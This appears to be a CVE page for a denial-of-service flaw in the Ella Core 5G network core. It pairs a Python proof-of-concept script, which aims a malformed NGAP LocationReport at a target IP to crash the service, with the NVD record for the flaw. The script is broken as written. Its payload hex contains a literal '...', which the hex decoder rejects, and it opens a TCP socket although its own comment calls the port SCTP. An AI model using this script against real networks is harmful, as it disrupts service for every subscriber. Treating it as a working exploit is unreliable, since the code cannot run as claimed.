CVE-2026-33282

import socket # PoC for CVE-2026-33282: Ella Core DoS # This script sends a malformed NGAP LocationReport message # missing the optional UEPresenceInAreaOfInterestList IE. def send_exploit(target_ip, target_port): # Malformed NGAP payload (Simplified representation) # In a real scenario, this requires proper ASN.1 PER encoding # with the specific IE omitted. # Note: Actual byte construction depends on NGAP specs. malformed_payload = bytes.fromhex( "001a" # NGAP PDU type "4003" # Initiating Message "..." # Specific LocationReport structure without the target IE ) try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(5) sock.connect((target_ip, target_port)) print(f"[+] Sending malformed packet to {target_ip}:{target_port}") sock.send(malformed_payload) print("[+] Packet sent. Check if the service crashed.") sock.close() except Exception as e: print(f"[-] Error: {e}") if __name__ == "__main__": target = "192.168.1.100" # Replace with actual target IP port = 38412 # Default SCTP/NGAP port (might need specific framing) send_exploit(target, port)

{"cve": {"id": "CVE-2026-33282", "sourceIdentifier": "[email protected]", "published": "2026-03-24T00:16:30.370", "lastModified": "2026-03-24T19:31:44.117", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ella Core is a 5G core designed for private networks. Versions prior to 1.6.0 panic when processing a malformed NGAP LocationReport message with `ue-presence-in-area-of-interest` event type and omitting the optional `UEPresenceInAreaOfInterestList` IE. An attacker able to send crafted NGAP messages to Ella Core can crash the process, causing service disruption for all connected subscribers. No authentication is required. Version 1.6.0 added IE presence verification to NGAP message handling."}, {"lang": "es", "value": "Ella Core es un núcleo 5G diseñado para redes privadas. Las versiones anteriores a la 1.6.0 entran en pánico al procesar un mensaje NGAP LocationReport malformado con tipo de evento 'ue-presence-in-area-of-interest' y omitiendo el IE opcional 'UEPresenceInAreaOfInterestList'. Un atacante capaz de enviar mensajes NGAP manipulados a Ella Core puede bloquear el proceso, causando interrupción del servicio para todos los suscriptores conectados. No se requiere autenticación. La versión 1.6.0 añadió verificación de presencia de IE al manejo de mensajes NGAP."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ellanetworks:ella_core:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.6.0", "matchCriteriaId": "4A60BFD6-666C-4509-BE38-04CBFF557242"}]}]}], "references": [{"url": "https://github.com/ellanetworks/core/security/advisories/GHSA-826q-wrq4-p23x", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}